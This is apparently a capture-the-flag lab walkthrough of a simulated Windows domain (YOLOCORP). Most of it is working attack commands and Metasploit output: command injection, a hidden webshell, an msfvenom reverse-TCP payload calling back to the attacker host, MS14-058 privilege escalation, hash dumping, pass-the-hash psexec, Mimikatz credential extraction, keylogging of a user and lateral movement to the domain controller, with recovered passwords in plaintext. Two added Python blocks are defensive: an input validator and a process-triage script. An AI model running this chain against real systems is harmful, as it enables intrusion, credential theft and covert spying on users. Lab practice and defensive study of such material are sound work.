http://192.168.8.10
127.0.0.1 | dir
Volume in drive C has no label.
Volume Serial Number is A4A0-78D3
Directory of C:\inetpub\wwwroot
06/10/2016 04:21 PM <DIR> .
06/10/2016 04:21 PM <DIR> ..
02/09/2016 03:27 PM 141 flag-c4f8090e8d371207aa47b616552ad66f.txt
02/09/2016 02:50 PM 432 index.php
02/09/2016 04:18 PM 4,884 super_crappy_webshell.php
3 File(s) 5,457 bytes
2 Dir(s) 5,981,073,408 bytes free
http://192.168.8.15/flag-c4f8090e8d371207aa47b616552ad66f.txt
FLAG-CommandInjectionAsAService
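The `127.0.0.1 | dir` input above only works because the form field reaches a command shell as part of one string. The following is an added example, not the challenge's index.php (whose source the write-up does not show): a Python sketch of the same ping handler, with the vulnerable command string next to a hardened argv builder. All function names are hypothetical.

```python
import ipaddress
import subprocess


def vulnerable_command(host):
    """What a naive handler gives the shell: the field is pasted into one string,
    so "127.0.0.1 | dir" becomes a two-command pipeline."""
    return "ping -n 1 " + host


def safe_argv(host):
    """Accept only a literal IPv4 address and return an argv list (never a string).

    IPv4 only on purpose: Python's IPv6 parser accepts free-form text after a
    '%' scope id, which would let arbitrary characters through validation.
    """
    try:
        addr = ipaddress.IPv4Address(host.strip())
    except ValueError:
        raise ValueError("host must be a literal IPv4 address") from None
    return ["ping", "-n", "1", str(addr)]


def run_ping(host):
    """Run ping with no shell in between; metacharacters are never interpreted."""
    done = subprocess.run(safe_argv(host), shell=False,
                          capture_output=True, text=True, timeout=10)
    return done.stdout


def screen(samples):
    """Return (input, verdict) pairs so rejected inputs can be logged and alerted on."""
    out = []
    for s in samples:
        try:
            safe_argv(s)
            out.append((s, "accepted"))
        except ValueError:
            out.append((s, "rejected"))
    return out


# Constructed inputs: the one from this page plus benign edge cases.
SAMPLES = ["127.0.0.1", " 10.0.0.5 ", "127.0.0.1 | dir", "localhost", "::1%x"]

if __name__ == "__main__":
    for value, verdict in screen(SAMPLES):
        print(f"{verdict:9} {value!r}")
```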
HINT : Now use the hidden webshell to upload and execute a meterpreter.
Ref : http://netsec.ws/?p=331
http://192.168.8.15/super_crappy_webshell.php
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.8.8 LPORT=1234 -f exe > shell.exe
We can start a reverse TCP handler with Metasploit …
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
exploit
Use the ms14_058_track_popup_menu exploit with a bind_tcp or reverse payload:
use exploit/windows/local/ms14_058_track_popup_menu
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.8.8
C:\>type flag-admins-only.txt
type flag-admins-only.txt
Flag-LookMomImALocalAdmin!
Next, we run hashdump to get the users' hashes.
use exploit/windows/smb/psexec
set rhost 192.168.8.11
set smbpass aad3b435b51404eeaad3b435b51404ee:d7e233670b66858a436c353b205d4faa
set smbuser it_support
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.11:445 as user 'it_support'...
[*] Selecting PowerShell target
[*] 192.168.8.11:445 - Executing the payload...
[+] 192.168.8.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.11
[*] Meterpreter session 2 opened (192.168.8.8:4444 -> 192.168.8.11:50295) at 2016-08-09 14:06:08 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-02-10 12:03:28 -0500 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-02-09 16:59:44 -0500 Program Files
40555/r-xr-xr-x 0 dir 2009-07-14 00:57:06 -0400 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-02-10 12:06:17 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-09 16:31:31 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-08-09 06:16:10 -0400 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-10 12:34:05 -0500 Users
40777/rwxrwxrwx 0 dir 2016-08-09 03:39:25 -0400 Windows
40777/rwxrwxrwx 0 dir 2016-02-09 16:33:28 -0500 d678c75c649fe4979f61ee29093de8
100666/rw-rw-rw- 198 fil 2016-02-10 12:32:06 -0500 flag-pass-the-hash.txt
100666/rw-rw-rw- 2147016704 fil 2016-08-09 03:49:56 -0400 pagefile.sys
cat flag-pass-the-hash.txt
Flag-AHashIsAPasswordRight?
Hints:
Maybe a privileged user did log into this machine to fix an issue. Check in memory, maybe you could find some useful information... Wink Wink, Mimikatz!
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
272 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
300 480 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
328 480 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
336 328 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
376 368 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
384 328 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
416 368 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
480 384 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
488 384 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
496 384 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
560 480 taskhost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\taskhost.exe
588 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
664 480 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
736 416 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
752 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
788 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
812 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
936 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1048 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 480 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1256 480 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
1264 480 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1624 480 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1848 1008 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2272 480 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2656 480 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2684 480 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2736 336 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
migrate 788
[*] Migrating from 1848 to 788...
[*] Migration completed successfully.
load kiwi
creds_all
Domain User Password LM Hash NTLM Hash
------ ---- -------- ------- ---------
YOLOCORP it_guy JuvavSecurity2016
use exploit/windows/smb/psexec
set rhost 192.168.8.12
set smbuser it_guy
set smbpass JuvavSecurity2016
set smbdomain YOLOCORP
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.12:445|YOLOCORP as user 'it_guy'...
[*] Selecting PowerShell target
[*] 192.168.8.12:445 - Executing the payload...
[+] 192.168.8.12:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.12
[*] Meterpreter session 4 opened (192.168.8.8:4444 -> 192.168.8.12:53552) at 2016-08-09 14:16:36 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2016-02-10 10:55:21 -0500 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:08:56 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-02-09 16:59:44 -0500 Program Files
40555/r-xr-xr-x 0 dir 2009-07-14 00:57:06 -0400 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-02-10 11:53:06 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-09 16:31:31 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-08-09 06:45:22 -0400 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-10 12:18:35 -0500 Users
40777/rwxrwxrwx 0 dir 2016-08-09 03:34:45 -0400 Windows
40777/rwxrwxrwx 0 dir 2016-02-09 16:33:28 -0500 d678c75c649fe4979f61ee29093de8
100666/rw-rw-rw- 186 fil 2016-02-11 14:27:50 -0500 flag-it-guy.txt
100666/rw-rw-rw- 2147016704 fil 2016-08-09 03:42:55 -0400 pagefile.sys
cat flag-it-guy.txt
Flag-ITGuy,IGotYourPassword!
Hints:
Now You should look for the Domain Admin account password : It is not located on this machine.
Maybe IT guy is actively working now.
Maaaybe...
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
160 408 conhost.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\conhost.exe
224 500 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
260 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
356 348 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
396 348 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
408 388 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
444 388 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
500 396 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
516 396 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
524 396 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
580 500 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
628 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
700 500 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
708 1016 SearchFilterHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchFilterHost.exe
804 500 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
808 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
844 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
884 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
984 884 wuauclt.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\wuauclt.exe
1016 500 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
1092 500 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1124 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1164 500 taskhost.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\taskhost.exe
1252 500 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1356 500 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1388 1816 mstsc.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\mstsc.exe
1700 500 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1736 844 dwm.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\dwm.exe
1776 628 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
1792 500 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1816 1868 explorer.exe x64 1 YOLOCORP\it_guy C:\Windows\explorer.exe
1980 2304 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
1988 500 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
2052 1016 SearchProtocolHost.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\SearchProtocolHost.exe
2192 356 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2228 2252 IT_Guy_Simulator.exe x64 1 YOLOCORP\it_guy C:\Users\it_guy\Desktop\IT_Guy_Simulator.exe
2252 884 taskeng.exe x64 1 YOLOCORP\it_guy C:\Windows\System32\taskeng.exe
2576 1816 vmtoolsd.exe x64 1 YOLOCORP\it_guy C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2676 1016 SearchProtocolHost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchProtocolHost.exe
2716 500 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
migrate 1816
keyscan_start
keyscan_dump
Dumping captured keystrokes...
app <CapsLock> s <CapsLock> erver <CapsLock> a <CapsLock> dministrator <Tab> <CapsLock> s <CapsLock> uper <CapsLock>
d <CapsLock> umb <CapsLock> p <CapsLock> assword1234 <Return> <LWin> mstsc <Return> 192.168.8.13 <Return> app <CapsLock>
s <CapsLock> erver <CapsLock> a <CapsLock> dministrator <Tab> <CapsLock> s <CapsLock> uper <CapsLock> d <CapsLock> umb
<CapsLock> p <CapsLock> assword1234 <Return> <LWin> mstsc <Return> 192.168.8.13 <Return> app <CapsLock> s <CapsLock>
erver <CapsLock> a <CapsLock> dministrator <Tab> <CapsLock> s <CapsLock> uper <CapsLock> d <CapsLock> umb <CapsLock> p
<CapsLock> assword12
// 192.168.8.13 APPSERVER\Administrator SuperDumbPassword1234
### Command
use exploit/windows/smb/psexec
set rhost 192.168.8.13
set smbuser Administrator
set smbpass SuperDumbPassword1234
set smbdomain APPSERVER
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.13:445|APPSERVER as user 'Administrator'...
[*] Selecting PowerShell target
[*] 192.168.8.13:445 - Executing the payload...
[+] 192.168.8.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.13
[*] Meterpreter session 6 opened (192.168.8.8:4444 -> 192.168.8.13:49679) at 2016-08-09 14:28:31 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-07-13 22:34:39 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-07-25 14:33:21 -0400 Program Files
40555/r-xr-xr-x 0 dir 2009-07-14 01:06:53 -0400 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-07-25 14:33:21 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-10 21:05:52 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-02-10 21:03:57 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-11 13:42:46 -0500 Users
40777/rwxrwxrwx 0 dir 2016-07-25 14:31:16 -0400 Windows
100666/rw-rw-rw- 133 fil 2016-02-11 14:19:21 -0500 flag.txt
100666/rw-rw-rw- 4294500352 fil 2016-07-25 14:35:01 -0400 pagefile.sys
cat flag.txt
Flag-SpyingOnUsersIsBad
Hint: The Domain administrator is connected to this machine. His password will be somewhere in memory...
ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
228 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
248 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
320 312 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
336 320 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
372 364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
380 312 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
416 364 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
476 380 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
492 380 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
504 380 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
604 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
680 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
764 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
804 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
848 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
888 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
932 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1032 476 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1112 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1152 604 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
1172 476 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1232 476 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1284 2516 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
1436 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1576 476 taskhost.exe x64 1 YOLOCORP\Administrator C:\Windows\System32\taskhost.exe
1616 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1652 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1680 476 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1720 476 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
1816 476 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
1928 1284 notepad.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\notepad.exe
2020 604 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2120 888 dwm.exe x64 1 YOLOCORP\Administrator C:\Windows\System32\dwm.exe
2144 2104 explorer.exe x64 1 YOLOCORP\Administrator C:\Windows\explorer.exe
2396 2144 vmtoolsd.exe x64 1 YOLOCORP\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
2700 476 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
2780 476 WmiApSrv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiApSrv.exe
3044 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
migrate 416
[*] Migrating from 1284 to 416...
[*] Migration completed successfully.
load kiwi
creds_all
Domain User Password LM Hash NTLM Hash
------ ---- -------- ------- ---------
YOLOCORP Administrator MegaSecurePassword1337
### Command
msfconsole
use exploit/windows/smb/psexec
set rhost 192.168.8.1
set smbuser Administrator
set smbpass MegaSecurePassword1337
set smbdomain YOLOCORP
exploit
[*] Started reverse TCP handler on 192.168.8.8:4444
[*] Connecting to the server...
[*] Authenticating to 192.168.8.1:445|YOLOCORP as user 'Administrator'...
[*] Selecting PowerShell target
[*] 192.168.8.1:445 - Executing the payload...
[+] 192.168.8.1:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (957487 bytes) to 192.168.8.1
[*] Meterpreter session 1 opened (192.168.8.8:4444 -> 192.168.8.1:52457) at 2016-08-09 14:58:13 -0400
cd /
ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-07-13 22:34:39 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 01:06:44 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 23:20:08 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2016-02-09 12:27:32 -0500 Program Files
40555/r-xr-xr-x 0 dir 2016-02-09 12:27:33 -0500 Program Files (x86)
40777/rwxrwxrwx 0 dir 2016-02-10 10:49:07 -0500 ProgramData
40777/rwxrwxrwx 0 dir 2016-02-09 19:21:42 -0500 Recovery
40777/rwxrwxrwx 0 dir 2016-02-09 12:28:04 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2016-02-09 19:24:03 -0500 Users
40777/rwxrwxrwx 0 dir 2016-06-08 09:49:12 -0400 Windows
100666/rw-rw-rw- 29 fil 2016-06-08 12:44:42 -0400 flag.txt.txt
100666/rw-rw-rw- 4294500352 fil 2016-08-08 15:25:11 -0400 pagefile.sys
cat flag.txt.txt
FLAG-G00dJ0bY0uG0tTh3L4stFl4g
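Each `ps` listing above shows the same trace after the psexec PowerShell target runs: a 32-bit powershell.exe as SYSTEM in session 0 whose parent PID is no longer in the list (PIDs 1848, 1980 and 1284). The following is an added example, not part of the original write-up: a Python triage script that parses rows in this format and flags that pattern. The sample rows are copied from the third listing; the rules and the GUI_APPS list are assumptions for illustration.

```python
import re

# Constructed sample: rows copied from the third `ps` listing above.
SAMPLE = r"""
476 380 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
492 380 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
604 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1284 2516 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
1928 1284 notepad.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\notepad.exe
2144 2104 explorer.exe x64 1 YOLOCORP\Administrator C:\Windows\explorer.exe
"""

# PID PPID Name Arch Session User Path; the user may contain a space, so it is
# matched lazily up to the drive letter that starts the path.
ROW = re.compile(r"^(\d+)\s+(\d+)\s+(\S+)\s+(x86|x64)\s+(\d+)\s+(.+?)\s+([A-Za-z]:\\.*)$")

# Assumption: interactive programs with no reason to run as SYSTEM in session 0.
GUI_APPS = {"notepad.exe", "calc.exe", "mspaint.exe"}


def parse(text):
    """Parse listing rows; rows without user/path (e.g. 'System') are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            pid, ppid, name, arch, sess, user, path = m.groups()
            procs.append({"pid": int(pid), "ppid": int(ppid), "name": name.lower(),
                          "arch": arch, "session": int(sess), "user": user, "path": path})
    return procs


def triage(procs):
    """Return (pid, reason) findings. A missing parent alone is not flagged:
    explorer.exe normally outlives the process that started it."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p["ppid"])
        system = p["user"].upper() == r"NT AUTHORITY\SYSTEM"
        if (p["name"] == "powershell.exe" and p["arch"] == "x86" and system
                and p["session"] == 0 and parent is None):
            findings.append((p["pid"], "orphaned 32-bit SYSTEM powershell.exe in session 0"))
        if (parent and parent["name"] == "powershell.exe" and system
                and p["session"] == 0 and p["name"] in GUI_APPS):
            findings.append((p["pid"], "GUI app as SYSTEM in session 0 under powershell.exe"))
    return findings


if __name__ == "__main__":
    for pid, reason in triage(parse(SAMPLE)):
        print(pid, reason)
```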